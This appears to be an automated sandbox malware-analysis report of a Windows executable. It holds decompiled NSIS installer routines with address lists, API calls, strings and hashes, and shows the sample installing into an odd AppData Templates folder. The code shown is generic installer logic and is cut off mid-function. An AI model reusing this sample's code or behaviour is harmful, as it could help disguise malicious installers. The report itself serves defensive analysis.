				if(_t22 == 0) {
					_t76 = 0x423708;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E004063D5(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423708, 0);
					__eflags =  *0x423708;
					if(__eflags == 0) {
						E004063D5(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423708, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E0040644E(L"1033", _t73 & 0x0000ffff);
				}
				E00403E8C(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Lagerhals\\Territorially";
				 *0x42a2a0 =  *0x42a238 & 0x00000020;
				 *0x42a2bc = 0x10000;
				if(E00405EDE(_t90, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Lagerhals\\Territorially") != 0) {
					L16:
					if(E00405EDE(_t98, _t86) == 0) {
						E00406544(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x42a220, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429208 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403E8C(_t78, __eflags);
							__eflags =  *0x42a2c0;
							if( *0x42a2c0 != 0) {
								_t33 = E0040563C(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x4291ec;
								if( *0x4291ec == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x4236e8, 5); // executed
							_t39 = E00406864("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E00406864("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x4291c0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x4291c0);
								 *0x4291e4 = _t87;
								RegisterClassW(0x4291c0);
							}
							_t44 = DialogBoxParamW( *0x42a220,  *0x429200 + 0x00000069 & 0x0000ffff, 0, E00403F64, 0); // executed
							E00403B06(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a220;
						 *0x4291c4 = E00401000;
						 *0x4291d0 =  *0x42a220;
						 *0x4291d4 = _t30;
						 *0x4291e4 = 0x40a380;
						if(RegisterClassW(0x4291c0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x4236e8 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a220, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x4281c0;
					E004063D5(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a258 + _t78 * 2,  *0x42a258 +  *(_t82 + 0x4c) * 2, 0x4281c0, 0);
					_t63 =  *0x4281c0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x4281c2;
						 *((short*)(E00405E03(0x4281c2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406507(_t86, E00405DD6(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E22(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403bbc
0x00403bc5
0x00403bcc
0x00403bce
0x00403be2
0x00403bf4
0x00403bfd
0x00403c06
0x00403c0d
0x00403c12
0x00403c19
0x00403c2c
0x00403c2c
0x00403c37
0x00403bd0
0x00403bd0
0x00403bdb
0x00403bdb
0x00403c3c
0x00403c46
0x00403c4f
0x00403c54
0x00403c65
0x00403cf7
0x00403cff
0x00403d08
0x00403d08
0x00403d1e
0x00403d24
0x00403d32
0x00403db3
0x00403dbb
0x00403dc5
0x00403dca
0x00403dd0
0x00403e5a
0x00403e5f
0x00403e61
0x00403e7d
0x00000000
0x00403e7d
0x00403e63
0x00403e69
0x00403e71
0x00403e71
0x00000000
0x00403e69
0x00403dde
0x00403de9
0x00403dee
0x00403df0
0x00403df7
0x00403df7
0x00403e02
0x00403e0a
0x00403e0c
0x00403e0e
0x00403e17
0x00403e1a
0x00403e20
0x00403e20
0x00403e3f
0x00403e50
0x00000000
0x00403e55
0x00403dbd
0x00403dbf
0x00000000
0x00403d34
0x00403d34
0x00403d40
0x00403d4a
0x00403d50
0x00403d55
0x00403d64
0x00403e82
0x00403e82
0x00000000
0x00403e82
0x00403d73
0x00403dae
0x00000000
0x00403dae
0x00403c6b
0x00403c6b
0x00403c6e
0x00403c70
0x00000000
0x00000000
0x00403c7e
0x00403c90
0x00403c95
0x00403c9e
0x00000000
0x00000000
0x00403ca4
0x00403ca6
0x00403cb3
0x00403cb3
0x00403cbc
0x00403cc2
0x00403cea
0x00403cf2
0x00000000
0x00403cd4
0x00403cd5
0x00403cde
0x00403ce4
0x00403ce5
0x00000000
0x00403ce5
0x00403ce0
0x00403ce2
0x00000000
0x00000000
0x00000000
0x00403ce2
0x00403cc2

APIs

Part of subcall function 004068D4: GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
Part of subcall function 004068D4: GetProcAddress.KERNEL32(00000000,?), ref: 00406901

GetUserDefaultUILanguage.KERNELBASE(00000002,770F3420,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403BD0

Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B

lstrcatW.KERNEL32(1033,00423708), ref: 00403C37
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,770F3420), ref: 00403CB7
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403CCA
GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403CD5
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially), ref: 00403D1E
RegisterClassW.USER32(004291C0), ref: 00403D5B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403D73
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DA8
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DDE
GetClassInfoW.USER32(00000000,RichEdit20W,004291C0), ref: 00403E0A
GetClassInfoW.USER32(00000000,RichEdit,004291C0), ref: 00403E17
RegisterClassW.USER32(004291C0), ref: 00403E20
DialogBoxParamW.USER32(?,00000000,00403F64,00000000), ref: 00403E3F

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially, xrefs: 00403C46, 00403C4E, 00403CF1, 00403CF7, 00403D07
RichEd32, xrefs: 00403DF2
C:\Users\user\AppData\Local\Temp\, xrefs: 00403BBB
.DEFAULT\Control Panel\International, xrefs: 00403C22
Control Panel\Desktop\ResourceLocale, xrefs: 00403BEA
1033, xrefs: 00403BD6, 00403C32
Call, xrefs: 00403C7E, 00403C87, 00403C95, 00403CE4, 00403CEA
RichEdit20W, xrefs: 00403E02, 00403E08
RichEd20, xrefs: 00403DE4
RichEdit, xrefs: 00403E11
_Nb, xrefs: 00403D3A, 00403DA2
.exe, xrefs: 00403CC4

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-2217849643
Opcode ID: e27dd36c7e3ea7d4b0518f1200331748326bb14958ad4778a213b023eb595640
Instruction ID: f8e28dda484975e23f2397f6e39507faffe4a9094113ace64084d81fe028ea3a
Opcode Fuzzy Hash: e27dd36c7e3ea7d4b0518f1200331748326bb14958ad4778a213b023eb595640
Instruction Fuzzy Hash: B761D570244200BBD720AF66AD45F2B3A6CEB84B49F40453FFD41B62E1DB795912CA7D

Uniqueness

Uniqueness Score: -1.00%

Function 0040307D Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E0040307D(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				long _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\Arthur\\Desktop\\xKBLVUHoY6.exe";
				 *0x42a22c = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\xKBLVUHoY6.exe", 0x400);
				_t89 = E00405FF7(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				_t92 = L"C:\\Users\\Arthur\\Desktop";
				E00406507(L"C:\\Users\\Arthur\\Desktop", _t91);
				E00406507(0x439000, E00405E22(_t92));
				_t50 = GetFileSize(_t89, 0);
				 *0x420ec4 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00403019(1);
					if( *0x42a234 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t34 =  &_v24; // 0x403847
						_t53 = GlobalAlloc(0x40,  *_t34); // executed
						_t94 = _t53;
						E004034AF( *0x42a234 + 0x1c);
						_t35 =  &_v24; // 0x403847
						_push( *_t35);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004032B4(); // executed
						if(_t57 == _v24) {
							 *0x42a230 = _t94;
							 *0x42a238 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42a23c =  *0x42a23c + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405FB2(0x42a240, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E004034AF( *0x414eb8);
					if(E00403499( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42a234) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						if(E00403499(0x40ceb8, _t90) == 0) {
							E00403019(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42a234 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00403019(0);
							}
							goto L20;
						}
						E00405FB2( &_v44, 0x40ceb8, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x414eb8; // 0x4af63
							 *0x42a2c0 =  *0x42a2c0 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x42a234 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t93 = _t80 - 4;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x420ec4) {
							_v12 = E004069C1(_v12, 0x40ceb8, _t90);
						}
						 *0x414eb8 =  *0x414eb8 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 != 0);
					_t82 = 0;
					goto L24;
				}
			}

0x00403085
0x00403088
0x0040308b
0x0040308e
0x00403094
0x004030a5
0x004030aa
0x004030bd
0x004030c2
0x004030c5
0x004030cb
0x00000000
0x004030cd
0x004030d8
0x004030de
0x004030ef
0x004030f6
0x004030fe
0x00403103
0x00403105
0x004031f0
0x004031f2
0x004031fe
0x00000000
0x00000000
0x00403203
0x00403227
0x00403227
0x0040322c
0x00403232
0x0040323d
0x00403242
0x00403242
0x00403245
0x00403246
0x00403247
0x00403249
0x00403251
0x00403268
0x00403270
0x00403275
0x00403277
0x00403277
0x0040327f
0x0040327f
0x00403282
0x00403283
0x00403283
0x00403286
0x00403288
0x00403288
0x00403292
0x00403298
0x004032a6
0x00000000
0x004032ab
0x00000000
0x00403251
0x0040320b
0x0040321d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040310b
0x00403110
0x00403115
0x00403119
0x00403120
0x00403127
0x00403129
0x00403129
0x00403134
0x0040325c
0x00403253
0x00000000
0x00403253
0x00403141
0x004031c1
0x004031c5
0x004031ca
0x00000000
0x004031c1
0x0040314a
0x0040314f
0x00403157
0x0040317d
0x00403183
0x0040318c
0x00403192
0x00403197
0x0040319d
0x00000000
0x00000000
0x004031a7
0x004031af
0x004031b2
0x004031b7
0x004031b9
0x004031b9
0x00000000
0x00000000
0x00000000
0x00000000
0x004031a7
0x004031cb
0x004031d1
0x004031dd
0x004031dd
0x004031e0
0x004031e6
0x004031e6
0x004031ee
0x00000000
0x004031ee

APIs

GetTickCount.KERNEL32 ref: 0040308E
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\xKBLVUHoY6.exe,00000400,?,?,?,?,?,00403847,?), ref: 004030AA

Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\xKBLVUHoY6.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\xKBLVUHoY6.exe,C:\Users\user\Desktop\xKBLVUHoY6.exe,80000000,00000003,?,?,?,?,?,00403847), ref: 004030F6
GlobalAlloc.KERNELBASE(00000040,G8@,?,?,?,?,?,00403847,?), ref: 0040322C

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
Null, xrefs: 00403174
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
soft, xrefs: 0040316B
Inst, xrefs: 00403162
Error launching installer, xrefs: 004030CD
G8@, xrefs: 00403227, 00403242
C:\Users\user\Desktop\xKBLVUHoY6.exe, xrefs: 00403094, 004030A3, 004030B7, 004030D7
C:\Users\user\Desktop, xrefs: 004030D8, 004030DD, 004030E3

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\xKBLVUHoY6.exe$Error launching installer$G8@$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-431540005
Opcode ID: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
Instruction ID: 1a01736021049f1647ec9a5272654600d533d4cd09788acd7f842f4bfc25432a
Opcode Fuzzy Hash: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
Instruction Fuzzy Hash: 06518371901205AFDB209F65DD82B9E7EACEB09756F10807BF901B62D1C77C8F418A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00406544 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E00406544(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x4291fc - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a258 + _t44 * 2;
				_t45 = 0x4281c0;
				_t108 = 0x4281c0;
				if(_a4 >= 0x4281c0 && _a4 - 0x4281c0 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406507(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E00406544(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x4281c0;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406507(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E0040644E(_t108,  *0x42a228);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E0040678E(_t108);
							}
							goto L38;
						}
						if( *0x42a2a4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a224;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a228,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a228,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108); // executed
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E004063D5( *0x42a258, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a258 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040); // executed
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E00406544(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}

0x00406544
0x00406544
0x00406544
0x0040654a
0x0040654f
0x00406560
0x00406560
0x00406568
0x00406569
0x0040656a
0x0040656b
0x0040656e
0x00406576
0x00406578
0x00406589
0x0040658c
0x0040658c
0x00406590
0x00406596
0x00406599
0x00406774
0x00406774
0x0040677f
0x0040678b
0x0040678b
0x00000000
0x0040659f
0x004065a4
0x004065b9
0x004065ba
0x004065c0
0x00406752
0x00406760
0x00406763
0x00406763
0x00406754
0x00406757
0x0040675a
0x0040675c
0x0040675c
0x00406765
0x00406765
0x0040676b
0x0040676e
0x004065a1
0x00000000
0x004065a1
0x00000000
0x0040676e
0x004065c6
0x004065c9
0x004065d8
0x004065df
0x004065eb
0x004065ee
0x004065f1
0x004065f2
0x004065f7
0x004065fd
0x00406600
0x00406603
0x004066f6
0x004066fb
0x0040672e
0x00406733
0x00406738
0x0040673d
0x0040673d
0x00406742
0x00406748
0x0040674b
0x00000000
0x0040674b
0x004066fd
0x00406700
0x00406703
0x00406718
0x0040671f
0x00406705
0x0040670c
0x0040670c
0x00406727
0x0040672a
0x004066ee
0x004066ef
0x004066ef
0x00000000
0x0040672a
0x00406610
0x00406614
0x00406614
0x00406615
0x00406617
0x00406654
0x00406657
0x00406667
0x0040666a
0x00406672
0x00406678
0x00406678
0x004066d3
0x004066d3
0x004066d5
0x00000000
0x00000000
0x0040667c
0x00406681
0x00406682
0x00406684
0x0040669b
0x004066a9
0x004066af
0x004066b1
0x004066cf
0x004066cf
0x004066cf
0x00000000
0x004066cf
0x004066b7
0x004066c0
0x004066c3
0x004066c9
0x004066cd
0x00000000
0x00000000
0x00000000
0x004066cd
0x00406695
0x00406697
0x00406699
0x00000000
0x00000000
0x00000000
0x00406699
0x00000000
0x004066d3
0x0040665f
0x00000000
0x00406619
0x00406637
0x00406640
0x004066dd
0x004066e1
0x004066e9
0x004066e9
0x00000000
0x004066e1
0x0040664a
0x004066d7
0x004066db
0x00000000
0x00000000
0x00000000
0x004066db
0x00406617
0x00000000
0x004065a4

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040665F
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll,?,004055A0,Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll,00000000,00000000,00418EC0,00000000), ref: 00406672
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll,?,004055A0,Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll,00000000), ref: 00406743

Strings

Call, xrefs: 0040656E, 00406621, 00406628, 0040662C, 00406649, 0040665E, 00406671, 00406686, 004066B3, 004066E8, 004066EE, 0040670B, 0040671E, 0040673C, 00406742, 0040674B, 00406781
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040662D
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004066E3
Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll, xrefs: 00406569

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-1698975148
Opcode ID: caff3a63cdf462ad28e28b098a8ca9bbcc2bb6c884f685db01e738e9c1691dfa
Instruction ID: a0e829acba6452fa9eccf544198c9fcc7de98ae724d9d0e98a153b46e40356ac
Opcode Fuzzy Hash: caff3a63cdf462ad28e28b098a8ca9bbcc2bb6c884f685db01e738e9c1691dfa
Instruction Fuzzy Hash: 5261E371A00215ABDB209F64DC40AAE37A5EF44318F11813AE957B72D0D77E8AA1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E4D( *(_t86 - 8));
